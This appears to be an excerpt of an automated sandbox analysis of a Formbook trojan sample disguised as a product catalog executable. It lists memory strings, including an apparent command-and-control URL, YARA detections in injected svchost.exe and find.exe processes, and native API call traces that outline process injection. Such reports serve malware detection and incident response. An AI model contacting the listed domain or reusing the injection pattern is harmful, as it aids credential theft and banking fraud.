            Source: find.exe, 00000006.00000003.2378250788.00000000082AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: brfQTUZMGd.exe, 00000007.00000002.4192554567.0000000003368000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
            Source: find.exe, 00000006.00000003.2378250788.00000000082AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: find.exe, 00000006.00000003.2378250788.00000000082AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: find.exe, 00000006.00000003.2378250788.00000000082AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: find.exe, 00000006.00000002.4191342019.00000000031BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: find.exe, 00000006.00000002.4191342019.00000000031BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: find.exe, 00000006.00000002.4191342019.00000000031BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: find.exe, 00000006.00000002.4191342019.00000000031BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: find.exe, 00000006.00000002.4191342019.00000000031BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: find.exe, 00000006.00000002.4191342019.00000000031BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: find.exe, 00000006.00000003.2371131163.0000000008287000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: find.exe, 00000006.00000003.2378250788.00000000082AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: find.exe, 00000006.00000003.2378250788.00000000082AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: find.exe, 00000006.00000002.4192942372.00000000041B4000.00000004.10000000.00040000.00000000.sdmp, brfQTUZMGd.exe, 00000007.00000002.4192554567.0000000003044000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2482846125.000000001E2B4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.sailforever.xyz/uahh/?2FO=QBbT1R8&FJiPC=d5
            Source: find.exe, 00000006.00000002.4192942372.00000000041B4000.00000004.10000000.00040000.00000000.sdmp, brfQTUZMGd.exe, 00000007.00000002.4192554567.0000000003044000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2482846125.000000001E2B4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.sailforever.xyz/uahh/?2FO=QBbT1R8&amp;FJiPC=d5
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_00459FFF OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00459FFF
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_00459FFF OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00459FFF
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_00456354 GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW,0_2_00456354
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_0047C08E SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C08E

            E-Banking Fraud

            barindex
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.4192235926.0000000003530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4192191360.00000000034E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4190820397.0000000003030000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2191147685.00000000061F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2180613209.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4192038836.0000000003020000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2181390912.0000000004450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4191938504.0000000000D10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4192235926.0000000003530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4192191360.00000000034E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4190820397.0000000003030000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2191147685.00000000061F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2180613209.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.4192038836.0000000003020000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2181390912.0000000004450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.4191938504.0000000000D10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: initial sampleStatic PE information: Filename: Products Order Catalogs20242.exe
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042C1C3 NtClose,1_2_0042C1C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672B60 NtClose,LdrInitializeThunk,1_2_03672B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03672DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672C70 NtFreeVirtualMemory,LdrInitializeThunk,1_2_03672C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036735C0 NtCreateMutant,LdrInitializeThunk,1_2_036735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03674340 NtSetContextThread,1_2_03674340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03674650 NtSuspendThread,1_2_03674650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672BE0 NtQueryValueKey,1_2_03672BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672BF0 NtAllocateVirtualMemory,1_2_03672BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672BA0 NtEnumerateValueKey,1_2_03672BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672B80 NtQueryInformationFile,1_2_03672B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672AF0 NtWriteFile,1_2_03672AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672AD0 NtReadFile,1_2_03672AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672AB0 NtWaitForSingleObject,1_2_03672AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672F60 NtCreateProcessEx,1_2_03672F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672F30 NtCreateSection,1_2_03672F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672FE0 NtCreateFile,1_2_03672FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672FA0 NtQuerySection,1_2_03672FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672FB0 NtResumeThread,1_2_03672FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672F90 NtProtectVirtualMemory,1_2_03672F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672E30 NtWriteVirtualMemory,1_2_03672E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672EE0 NtQueueApcThread,1_2_03672EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672EA0 NtAdjustPrivilegesToken,1_2_03672EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672E80 NtReadVirtualMemory,1_2_03672E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672D30 NtUnmapViewOfSection,1_2_03672D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672D00 NtSetInformationFile,1_2_03672D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672D10 NtMapViewOfSection,1_2_03672D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672DD0 NtDelayExecution,1_2_03672DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672DB0 NtEnumerateKey,1_2_03672DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672C60 NtCreateKey,1_2_03672C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672C00 NtQueryInformationProcess,1_2_03672C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672CF0 NtOpenProcess,1_2_03672CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672CC0 NtQueryVirtualMemory,1_2_03672CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672CA0 NtQueryInformationToken,1_2_03672CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03673010 NtOpenDirectoryObject,1_2_03673010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03673090 NtSetValueKey,1_2_03673090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036739B0 NtGetContextThread,1_2_036739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03673D70 NtOpenThread,1_2_03673D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03673D10 NtOpenProcessToken,1_2_03673D10
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_03814340 NtSetContextThread,LdrInitializeThunk,6_2_03814340
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_03814650 NtSuspendThread,LdrInitializeThunk,6_2_03814650
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_03812BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_03812BA0
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_03812BE0 NtQueryValueKey,LdrInitializeThunk,6_2_03812BE0
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_03812BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_03812BF0
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_03812B60 NtClose,LdrInitializeThunk,6_2_03812B60
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_03812AD0 NtReadFile,LdrInitializeThunk,6_2_03812AD0
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_03812AF0 NtWriteFile,LdrInitializeThunk,6_2_03812AF0
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_03812FB0 NtResumeThread,LdrInitializeThunk,6_2_03812FB0
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_03812FE0 NtCreateFile,LdrInitializeThunk,6_2_03812FE0
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_03812F30 NtCreateSection,LdrInitializeThunk,6_2_03812F30
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_03812E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_03812E80
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_03812EE0 NtQueueApcThread,LdrInitializeThunk,6_2_03812EE0
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_03812DD0 NtDelayExecution,LdrInitializeThunk,6_2_03812DD0
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_03812DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_03812DF0
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_03812D10 NtMapViewOfSection,LdrInitializeThunk,6_2_03812D10
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_03812D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_03812D30
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_03812CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_03812CA0
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_03812C60 NtCreateKey,LdrInitializeThunk,6_2_03812C60
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_03812C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_03812C70
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_038135C0 NtCreateMutant,LdrInitializeThunk,6_2_038135C0
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_038139B0 NtGetContextThread,LdrInitializeThunk,6_2_038139B0
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_03812B80 NtQueryInformationFile,6_2_03812B80
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_03812AB0 NtWaitForSingleObject,6_2_03812AB0
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_03812F90 NtProtectVirtualMemory,6_2_03812F90
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_03812FA0 NtQuerySection,6_2_03812FA0
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_03812F60 NtCreateProcessEx,6_2_03812F60
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_03812EA0 NtAdjustPrivilegesToken,6_2_03812EA0
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_03812E30 NtWriteVirtualMemory,6_2_03812E30
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_03812DB0 NtEnumerateKey,6_2_03812DB0
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_03812D00 NtSetInformationFile,6_2_03812D00
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_03812CC0 NtQueryVirtualMemory,6_2_03812CC0
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_03812CF0 NtOpenProcess,6_2_03812CF0
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_03812C00 NtQueryInformationProcess,6_2_03812C00
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_03813090 NtSetValueKey,6_2_03813090
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_03813010 NtOpenDirectoryObject,6_2_03813010
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_03813D10 NtOpenProcessToken,6_2_03813D10
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_03813D70 NtOpenThread,6_2_03813D70
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_03059340 NtClose,6_2_03059340
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_030592A0 NtDeleteFile,6_2_030592A0
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_030591B0 NtReadFile,6_2_030591B0
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_03059040 NtCreateFile,6_2_03059040
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_030594A0 NtAllocateVirtualMemory,6_2_030594A0
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_00434D50: GetFullPathNameW,__swprintf,_wcslen,_wcslen,_wcslen,CreateDirectoryW,CreateFileW,_memset,_wcslen,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00434D50
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_004461ED _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_004461ED
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004364AA
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_00409A400_2_00409A40
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_004120380_2_00412038
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_0047E1FA0_2_0047E1FA
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_0041A46B0_2_0041A46B
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_0041240C0_2_0041240C
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_004045E00_2_004045E0
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_004128180_2_00412818
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_0047CBF00_2_0047CBF0
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_0044EBBC0_2_0044EBBC
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_00412C380_2_00412C38
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_0044ED9A0_2_0044ED9A
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_00424F700_2_00424F70
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_0041AF0D0_2_0041AF0D
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_004271610_2_00427161
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_004212BE0_2_004212BE
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_004433900_2_00443390
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_004433910_2_00443391
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_0041D7500_2_0041D750
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_004037E00_2_004037E0
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_004278590_2_00427859
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_0040F8900_2_0040F890
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_0042397B0_2_0042397B
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_00411B630_2_00411B63
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_00423EBF0_2_00423EBF
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_040D16680_2_040D1668
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004181131_2_00418113
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042E8031_2_0042E803
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040F91A1_2_0040F91A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004011201_2_00401120
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040F9231_2_0040F923
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004021D01_2_004021D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004162EE1_2_004162EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004162F31_2_004162F3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FB431_2_0040FB43
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040DBC31_2_0040DBC3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402C001_2_00402C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FA3521_2_036FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E3F01_2_0364E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037003E61_2_037003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E02741_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C02C01_2_036C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C81581_2_036C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036301001_2_03630100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DA1181_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F81CC1_2_036F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F41A21_2_036F41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037001AA1_2_037001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D20001_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036407701_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036647501_2_03664750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363C7C01_2_0363C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365C6E01_2_0365C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036405351_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037005911_2_03700591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F24461_2_036F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E44201_2_036E4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EE4F61_2_036EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FAB401_2_036FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F6BD71_2_036F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA801_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036569621_2_03656962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A01_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0370A9A61_2_0370A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364A8401_2_0364A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036428401_2_03642840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E8F01_2_0366E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036268B81_2_036268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B4F401_2_036B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03682F281_2_03682F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03660F301_2_03660F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E2F301_2_036E2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03632FC81_2_03632FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BEFA01_2_036BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640E591_2_03640E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FEE261_2_036FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FEEDB1_2_036FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03652E901_2_03652E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FCE931_2_036FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364AD001_2_0364AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DCD1F1_2_036DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363ADE01_2_0363ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03658DBF1_2_03658DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640C001_2_03640C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03630CF21_2_03630CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0CB51_2_036E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362D34C1_2_0362D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F132D1_2_036F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0368739A1_2_0368739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E12ED1_2_036E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365D2F01_2_0365D2F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365B2C01_2_0365B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036452A01_2_036452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0367516C1_2_0367516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F1721_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0370B16B1_2_0370B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364B1B01_2_0364B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F70E91_2_036F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FF0E01_2_036FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EF0CC1_2_036EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036470C01_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FF7B01_2_036FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036856301_2_03685630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F16CC1_2_036F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F75711_2_036F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037095C31_2_037095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DD5B01_2_036DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036314601_2_03631460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FF43F1_2_036FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FFB761_2_036FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B5BF01_2_036B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0367DBF91_2_0367DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365FB801_2_0365FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B3A6C1_2_036B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FFA491_2_036FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F7A461_2_036F7A46
